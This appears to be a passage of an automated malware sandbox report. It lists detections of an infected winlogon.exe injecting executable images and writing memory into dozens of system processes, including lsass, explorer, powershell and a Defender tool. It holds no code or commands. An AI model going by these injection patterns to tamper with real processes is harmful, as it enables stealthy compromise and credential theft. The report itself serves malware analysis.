        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 7C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2880000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 3070000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2C90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2A50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 10D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2C30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2D70000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C70000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1110000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: D20000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2A40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2870000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1030000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 12E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2660000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 29B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2F90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1380000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 15E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 15D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2360000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 21D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 800000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2BA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 800000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: F20000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2CF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 26B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1320000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1320000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: F70000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2D60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1540000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: D90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: CC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 21F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C20000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: AD0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2B30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 24A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C10000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E20000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 6E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2260000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2EF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: B80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: AE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 28E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\cmd.exe base: 1D54F9D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 281B7B90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D204D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\more.com base: 1F66CF40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 220C2280000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 220C22B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 170A7FA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 29E3CD50000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8811D0000 value starts with: 4D5AJump to behavior
        Injects code into the Windows Explorer (explorer.exe)
        Source: C:\Windows\System32\winlogon.exeMemory written: PID: 3084 base: 8C80000 value: 4DJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 8560Jump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\winlogon.exe base: 22FCE7B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\lsass.exe base: 19AB9340000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1A53E9B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dwm.exe base: 2382E970000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27D8F490000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1AD09E70000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 20EBF9D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 229EA670000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1777BD90000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1590E680000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21C29A30000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 276D7290000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21D84690000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 25BFDA60000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 16914530000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 227D2790000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 131E07D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 13EB1F30000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27714AC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 237FE190000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27C5FFB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9EE140000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1B6D8940000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 26099880000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 267E87C0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 223D5150000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 272401A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 24AD0130000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2565A3D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\spoolsv.exe base: DA0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 184F43B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2A196F80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21502F20000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1C8729B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 233591B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21DDF750000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 10E069A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 23F7E630000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 230BDE80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1ED12670000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 120CB340000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 297251A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1C84E940000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\sihost.exe base: 22ABD090000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 299C2130000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1A4D1190000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 280593C0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 28CCBE80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 253D40E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\ctfmon.exe base: 156E8510000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 20B71940000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\explorer.exe base: 8C80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1C55E370000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 192BE930000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dasHost.exe base: 12EBA690000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 207A8900000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2E7C2740000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2393C930000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 1A313AC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2D010620000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 22F16090000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 17740F80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1555CAF0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1EE9B270000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\SystemSettingsBroker.exe base: 198AF3F0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 29660B00000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25549A00000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 216C6E70000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 253DE550000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 261FF3A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1C5D53F0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1A2AB790000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 580000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 20BBD290000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1245E2D0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 210015E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1BFC2D40000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dllhost.exe base: 1ACAD650000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16740980000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 202E3B50000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 23CC1780000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 253E67B0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 26E0D650000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C10000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E10000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2EB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2EC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 610000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E80000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2CF0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000Jump to behavior
